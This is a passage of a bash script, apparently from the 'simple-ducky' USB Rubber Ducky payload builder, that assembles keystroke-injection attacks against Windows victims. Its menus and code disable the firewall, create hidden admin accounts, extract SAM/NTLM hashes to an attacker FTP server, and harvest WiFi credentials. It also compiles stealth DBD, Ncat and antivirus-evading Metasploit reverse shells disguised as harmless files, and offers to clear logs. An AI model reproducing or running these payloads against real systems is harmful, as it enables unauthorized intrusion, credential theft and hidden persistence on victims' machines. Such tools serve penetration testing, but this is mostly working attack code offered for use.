		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdWIN8nouac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del1.conf
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear


	if [ "$payloadtype" == "rev" ]; then
		read -p "Would you like me to setup a listener [y/n]? " listener
		clear
			if [ "$listener" == "n" ]; then
				read -p "Would you like to return to the main menu [y/n]? " option
			elif [ "$listener" == "y" ]; then
				xdg-open /usr/share/simple-ducky/ &
				service apache2 start
				clear
				chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd
				cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd
				dbd -lvp $attackerport -k $attackersecret
			fi
	elif [ "$payloadtype" == "bind" ]; then
		echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m"
		echo "dbd -nv victim.host.orip $victimport -k $attackersecret"
		echo ""
		read -p "Press any key to contiue" enter
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}
#################################################################################
# Payload Builder Banner
#################################################################################
f_payloadbuilderbanner(){
	clear
	echo -e "\e[1;31mWelcome to the Payload builder!\e[0m "
	echo -e 'Here every payload that the simple-ducky offers has been broken down by OS and permission level of the victim. In addition the options have been placed into three categories; Pre-Attack, Main-Attack and Post-Attack. Use as many or few as you would like.'
	echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo -e ""
}

########################################################################################################
# Payload Builder Menu
########################################################################################################
f_payloadbuilder(){
	clear
	f_payloadbuilderbanner
	echo ""
	echo -e "\e[1;34mPlease select the Windows OS that you would like to target...\e[0m"
	echo ""
	echo "1. Windows XP & derivatives (User/Admin Access)"
	echo "2. Windows Vista/7 & derivatives (User Access)"
	echo "3. Windows Vista/7 & derivatives (Admin Access)"
	echo "4. Windows 8 & derivatives (User Access)"
	echo "5. Windows 8 & derivatives (Admin Access)"
	echo "6. Return to the Main Menu"
	echo ""
	read -p "Option: " osselect

	if [ "$osselect" == "1" ]; then
		cat /usr/share/simple-ducky/payloads/builder/os-select/xpusrall.conf > /usr/share/simple-ducky/payload.txt
	elif [ "$osselect" == "2" ]; then
		cat /usr/share/simple-ducky/payloads/builder/os-select/win7usr.conf > /usr/share/simple-ducky/payload.txt
	elif [ "$osselect" == "3" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			cat /usr/share/simple-ducky/payloads/builder/os-select/win7admuac.conf > /usr/share/simple-ducky/payload.txt
		elif [ "$uacenabled" == "n" ]; then
			cat /usr/share/simple-ducky/payloads/builder/os-select/win7admnouac.conf > /usr/share/simple-ducky/payload.txt
		fi
	elif [ "$osselect" == "4" ]; then
		cat /usr/share/simple-ducky/payloads/builder/os-select/win8usr.conf > /usr/share/simple-ducky/payload.txt
	elif [ "$osselect" == "5" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			cat /usr/share/simple-ducky/payloads/builder/os-select/win8admuac.conf > /usr/share/simple-ducky/payload.txt
		elif [ "$uacenabled" == "n" ]; then
			cat /usr/share/simple-ducky/payloads/builder/os-select/win8admnouac.conf > /usr/share/simple-ducky/payload.txt
		fi
	elif [ "$osselect" == "6" ]; then
		f_mainmenu
fi

echo  >> /usr/share/simple-ducky/payload.txt
f_preattackadd
}

############## Pre Attack Functions ########################
f_preattackadd(){
if [[ $osselect = 1 || $osselect = 3 || $osselect = 5 ]] ; then
		clear
		echo -e "\e[1;34mLets add some pre attack functions...\e[0m"
		echo ""
		echo "1. Minimize the command prompt (recommended for large payloads)"
		echo "2. Disable the Windows Firewall"
		echo "3. Enable Remote Desktop and Remote Assistance"
		echo "4. Create and hide an Admin User"
		echo "5. Continue to Attack Functions"
		echo ""
		read -p "Option: " preattack

	case $preattack in
	1) f_minimizecmd ;;
	2) f_disablefirewall ;;
	3) f_enablerdp ;;
	4) f_createusr ;;
	5) f_attackadd ;;
	*) clear;exit ;;
	esac

elif [[ $osselect = 2 || $osselect = 4 ]]; then
		clear
		echo ""
		echo -e "\e[1;34mLets add some pre attack functions...\e[0m"
		echo ""
		echo "1. Minimize the command prompt (recommended for large payloads)"
		echo "2. Continue to Attack Functions"
		echo ""
		read -p "Option: " preattack

	case $preattack in
	1) f_minimizecmd ;;
	2) f_attackadd ;;
	*) clear;exit ;;
	esac
fi
}

############## Attack Functions ########################
f_attackadd(){
	if [[ $osselect = 3 || $osselect = 5 ]]; then
		clear
		echo -e "\e[1;34mMain Attack Functions...\e[0m"
		echo ""
		echo "1. Extract SAM & SYSTEM (VSSOwn.vbs)"
		echo "2. Shells with Powershell; (Metasploit, Ncat, DBD, Custom User Defined)"
		echo "3. Proxy in the Middle (PiTM)"
		echo "4. WiFi Credential Harvester"
		echo "5. Rouge Access Point"
		echo "6. Auto Associate to Rogue Access Point"
		echo "7. Local DNS Poisoning"
		echo "8. Download & Execute JAR"
		echo "9. Post Attack Options"
		echo ""
		read -p "Option: " mainattack

		case $mainattack in
		1) f_extracthash ;;
		2) f_revshells ;;
		3) f_pitmattack ;;
		4) f_wificreds ;;
		5) f_rogueaccess ;;
		6) f_autoassociate ;;
		7) f_dnspoison ;;
	        8) f_jarexecute ;;
		9) f_postattackadd ;;
		*) clear;exit ;;
		esac

 	elif [ "$osselect" == "1" ]; then
 		clear
		echo -e "\e[1;34mMain Attack Functions...\e[0m"
		echo ""
		echo "1. Reverse Shell (No Download)"
		echo "2. Proxy in the Middle (PiTM)"
		echo "3. WiFi Credential Harvester"
		echo "4. Rouge Access Point"
		echo "5. Local DNS Poisoning"
		echo "6. Post Attack Options"
		echo ""
		read -p "Option: " mainattack

		case $mainattack in
		1) f_revshells ;;
		2) f_pitmattack ;;
		3) f_wificreds ;;
		4) f_rogueaccess ;;
		5) f_dnspoison ;;
		6) f_postattackadd ;;
		*) clear;exit ;;
		esac

	elif [[ $osselect == 2 || $osselect = 4 ]]; then
		clear
		echo -e "\e[1;34mMain Attack Functions...\e[0m"
		echo ""
		echo "1. Shells with Powershell; (Metasploit, Ncat, DBD, Custom User Defined)"
		echo "2. Proxy in the Middle (PiTM)"
		echo "3. WiFi Credential Harvester"
		echo "4. Rouge Access Point"
		echo "5. Auto Associate to Rogue Access Point"
		echo "6. Post Attack Options"
		echo ""
		read -p "Option: " mainattack

		case $mainattack in
		1) f_revshells ;;
		2) f_pitmattack ;;
		3) f_wificreds ;;
		4) f_rogueaccess ;;
		5) f_autoassociate ;;
		6) f_postattackadd ;;
		*) clear;exit ;;
		esac
	fi
}
############## Post Attack Functions ########################
f_postattackadd(){
		if [[ $osselect = 3 || $osselect = 5 ]]; then
			clear
			echo -e "\e[1;34mPost Attack Functions...\e[0m"
			echo ""
			echo "1. Clear all Logs"
			echo "2. Create Inject.bin"
			echo ""
			read -p "Option: " postattack

			case $postattack in
			1) f_clearlogs ;;
			2) f_injectcreate ;;
			*) clear;exit ;;
			esac
		elif [[ $osselect = 2 || $osselect = 4 ]]; then
			clear
			echo -e "\e[1;34mThere are no post attack options for user level access. Finalizing the payload...\e[0m"
			echo ""
			sleep 4
			f_injectcreate
		elif [ "$osselect" == "1" ]; then
			clear
			echo -e "\e[1;34mThere are no post attack options for XP. Finalizing the payload...\e[0m"
			echo ""
			sleep 4
			f_injectcreate
		fi

}

############ Pre Attack Option Add ###########################

####### Minimize Command Prompt ###########
f_minimizecmd(){
	clear
	echo -e "\e[1;34mAdding the hide command prompt option to your payload...\e[0m"
	echo ""
	sleep 3
	cat /usr/share/simple-ducky/payloads/builder/pre-attack/hidecmd.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_preattackadd
}

####### Disable Firewall Option ###########
f_disablefirewall(){
	clear
	echo -e "\e[1;34mAdding the disable firewall option to your payload...\e[0m"
	echo ""
	sleep 3
	cat /usr/share/simple-ducky/payloads/builder/pre-attack/firewall.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_preattackadd
}

####### Enable Remote Desktop ###########
f_enablerdp(){
	clear
	echo -e "\e[1;34mAdding the enable remote desktop and remote assistant option to your payload...\e[0m"
	echo ""
	sleep 3
	cat /usr/share/simple-ducky/payloads/builder/pre-attack/rdpenable.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_preattackadd
}

####### Admin Account Add Option ###########
f_createusr(){
	clear
	echo -e "\e[1;34mLet's configure the admin account. Note, the account will be hiden from the windows login screen...\e[0m"
	echo ""
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	clear
	echo -e "\e[1;34mAdding the admin account to your payload...\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd.conf > /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del1.conf
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del1.conf > /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del2.conf
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del2.conf > /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del3.conf
	cat /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del3.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del1.conf
	rm /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del2.conf
	rm /usr/share/simple-ducky/payloads/builder/pre-attack/admusradd_del3.conf
	echo ""
	echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_preattackadd
}

############ Main Attack Option Add ###########################

####### Extract Live Hash Option ###########
f_extracthash(){
	clear
	echo -e "\e[1;34mLet's configure some settings for the LM/NTLM extraction...\e[0m"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerftp]: " webserverip
	echo ""
	read -p "Please set a password to be for your encrypted zip files: " zippassword
	echo ""
	clear
	echo -e "\e[1;34mAdding the live hash extractor to your payload...\e[0m"
	echo ""
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del1.conf
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del2.conf
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del3.conf
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del4.conf
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del4.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del5.conf
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del5.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del6.conf
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del6.conf > /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del7.conf
	cat /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del7.conf >> /usr/share/simple-ducky/payload.txt
	echo  >> /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del1.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del2.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del3.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del4.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del5.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del6.conf
	rm /usr/share/simple-ducky/payloads/builder/main-attack/livehash_del7.conf
	cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe
	echo ""
	echo -e "\e[1;32mDone! Returning to the Main-Attack menu...\e[0m"
	echo ""
	sleep 3
	f_attackadd
}
####### Down & Execute JAR    ###########
f_jarexecute(){
	clear
	echo -e "\e[1;34mDownload and Execute JAR\e[0m"
	echo ""
	read -p "Where is your JAR located? " jarpath
	echo ""
	#Check if file exists
	if [ -e $jarpath ]
	then
		echo "File is valid, copying to web server..."
		cp $jarpath /var/www/7za.txt
		clear
		echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
		echo ""
		echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
		read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
		echo ""
		clear
		echo -e "\e[1;34mAdding the JAR to your payload...\e[0m"
		echo ""
		sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute.conf > /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute_del1.conf
		cat /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute_del1.conf >> /usr/share/simple-ducky/payload.txt
		echo  >> /usr/share/simple-ducky/payload.txt
		rm /usr/share/simple-ducky/payloads/builder/main-attack/jarexecute_del1.conf
		echo ""
		read -p "Press Enter to continue..." contuinue
		f_attackadd
	else
		echo "File does not exist, please try again! (3 seconds)"
		sleep 3
		f_jarexecute
	fi
}
####### Reverse Shell Options ###########
f_revshells(){
	clear
	if [[ $osselect = 3 || $osselect = 5 ]]; then
		clear
		echo -e "\e[1;34mShell Options. Note: Only use one...\e[0m"
		echo ""
		echo "1. DBD Reverse Shell (Best | Provides an encrypted persistant shell every 90 minutes)"
		echo "2. Ncat Persistant Reverse Shell (Great | Provides a new shell everytime a user logs in)"
		echo "3. Metasploit Executable (Good | Gets dinged by most AV | Meterpreter or Standard Shell)"
		echo "4. No Download Reverse Shell (Great | Long build time)"
		echo ""
		read -p "Option: " shelltype

		if [ "$shelltype" == "1" ]; then
			clear
			echo -e "\e[1;34mLet's configure some settings for the DBD reverse shell...\e[0m"
			echo ""
			echo ""
			read -p "Where shall I send your persistent shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo ""
			read -p "What would you like the shared secret to be on your secure connection? " attackersecret
			echo ""
			clear
			echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
			sleep 3
			sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
			sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
			sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
			rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
			rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
			cd /usr/share/simple-ducky/misc/dbd/
			make mingw-cross CFLAGS=-DSTEALTH
			cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
			cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
			rm dbd.exe
			cd /usr/share/simple-ducky
			echo -e ""
			echo -e "\e[1;34mDone!\e[0m"
			sleep 3
			clear
			echo -e "\e[1;34mNow let's configure the setting to add to your inject.bin\e[0m"
			echo ""
			echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
			read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip
			echo ""
			clear
			echo -e "\e[1;34mAdding the DBD Revervse Shell to your payload...\e[0m"
			echo ""
			sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys.conf > /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys_del1.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys_del1.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/powershellsys_del1.conf
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			echo "dbd -lvp $attackerport -k $attackersecret"
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		elif [ "$shelltype" == "2" ]; then
			clear
			echo -e "\e[1;34mLet's configure some settings for Ncat persistant reverse shell...\e[0m"
			echo ""
			echo ""
			read -p "What would you like the username to be for your admin account? " attackeruser
			echo ""
			read -p "What would you like the password to be for your admin account? " attackerpass
			echo ""
			read -p "Where shall I send your persistent shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo ""
			echo -e "What is the IP/Domain address for your webserver? "
			read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
			echo ""
			clear
			echo -e "\e[1;34mAdding a persistant revervse shell to your payload...\e[0m"
			echo ""
			sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf
			sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf
			sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf
			sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf
			sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf > /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del1.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del2.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del3.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del4.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/ncshell_del5.conf
			cp /usr/share/simple-ducky/misc/ncat.exe /var/www/
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			echo "ncat -lvp $attackerport"
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		elif [ "$shelltype" == "3" ]; then
			clear
			echo -e "\e[1;34mLets start by building your evil executable\e[0m"
			echo ""
			echo ""
			read -p "Where shall I send your shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo -e ""
			read -p "Would you like a meterpreter or standard shell[ met | std ]? " payloadtype
			clear
			echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

			if [ "$payloadtype" == "met" ]; then
				msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
			else
				msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
			fi
			echo -e ""
			echo -e "\e[1;34mDone!\e[0m"
			sleep 3
			clear
			echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
			echo ""
			echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
			read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
			echo ""
			clear
			echo -e "\e[1;34mAdding a Metasploit shell to your payload...\e[0m"
			echo ""
			sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec.conf > /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			if [ "$payloadtype" == "met" ]; then
				echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport E"
			else
				echo " ncat -lvp $attackerport"
			fi
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		elif [ "$shelltype" == "4" ]; then
			clear
			echo -e "\e[1;34mLet's configure some settings for the no download reverse shell.\e[0m"
			echo ""
			echo ""
			read -p "Where shall I send your shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo ""
			clear
			echo -e "\e[1;34mAdding adding the no download shell to your payload...\e[0m"
			echo ""
			sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf
			sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf
			rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			echo "ncat -lvp $attackerport"
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		fi

	elif [ "$osselect" == "1" ]; then
		clear
		echo -e "\e[1;34mLet's configure some settings for the no download reverse shell.\e[0m"
		echo ""
		echo ""
		read -p "Where shall I send your shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		clear
		echo -e "\e[1;34mAdding adding the no download shell to your payload...\e[0m"
		echo ""
		sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf
		sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf
		cat /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf >> /usr/share/simple-ducky/payload.txt
		echo  >> /usr/share/simple-ducky/payload.txt
		rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del1.conf
		rm /usr/share/simple-ducky/payloads/builder/main-attack/nodownloadshell_del2.conf
		echo ""
		echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
		echo "ncat -lvp $attackerport"
		echo ""
		read -p "Press Enter to continue..." contuinue
		f_attackadd

	elif [[ $osselect == 2 || $osselect = 4 ]]; then
		clear
		echo -e "\e[1;34mShell Options. Note: Only use one...\e[0m"
		echo ""
		echo "1. DBD Reverse Shell (Best | Provides an encrypted persistant shell every 90 minutes)"
		echo "2. Metasploit Executable (Good | Gets dinged by most AV | Meterpreter or Standard Shell)"
		echo "3. No Download Reverse Shell (Great | Long build time)"
		echo ""
		read -p "Option: " shelltype

		if [ "$shelltype" == "1" ]; then
			clear
			echo -e "\e[1;34mLet's configure some settings for the DBD reverse shell...\e[0m"
			echo ""
			echo ""
			read -p "Where shall I send your persistent shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo ""
			read -p "What would you like the shared secret to be on your secure connection? " attackersecret
			echo ""
			clear
			echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
			sleep 3
			sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
			sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
			sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
			rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
			rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
			cd /usr/share/simple-ducky/misc/dbd/
			make mingw-cross CFLAGS=-DSTEALTH
			cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
			cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
			rm dbd.exe
			cd /usr/share/simple-ducky
			echo -e ""
			echo -e "\e[1;34mDone!\e[0m"
			sleep 3
			clear
			echo -e "\e[1;34mNow let's configure the setting to add to your inject.bin\e[0m"
			echo ""
			echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
			read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip
			echo ""
			clear
			echo -e "\e[1;34mAdding the DBD Revervse Shell to your payload...\e[0m"
			echo ""
			sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec.conf > /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf
			cat /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf >> /usr/share/simple-ducky/payload.txt
			echo  >> /usr/share/simple-ducky/payload.txt
			rm /usr/share/simple-ducky/payloads/builder/main-attack/powershellexec_del1.conf
			echo ""
			echo -e "\e[1;32mDone! When you are ready to receive your shell use this command...\e[0m"
			echo "dbd -lvp $attackerport -k $attackersecret"
			echo ""
			read -p "Press Enter to continue..." contuinue
			f_attackadd
		elif [ "$shelltype" == "2" ]; then
			clear
			echo -e "\e[1;34mLet's configure some settings for Ncat persistant reverse shell...\e[0m"
			echo ""
			echo ""
			read -p "What would you like the username to be for your admin account? " attackeruser
			echo ""
			read -p "What would you like the password to be for your admin account? " attackerpass
			echo ""
			read -p "Where shall I send your persistent shell? " attackerip
			echo ""
			read -p "What port will you be listening on? " attackerport
			echo ""
			echo -e "What is the IP/Domain address for your webserver? "
			read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
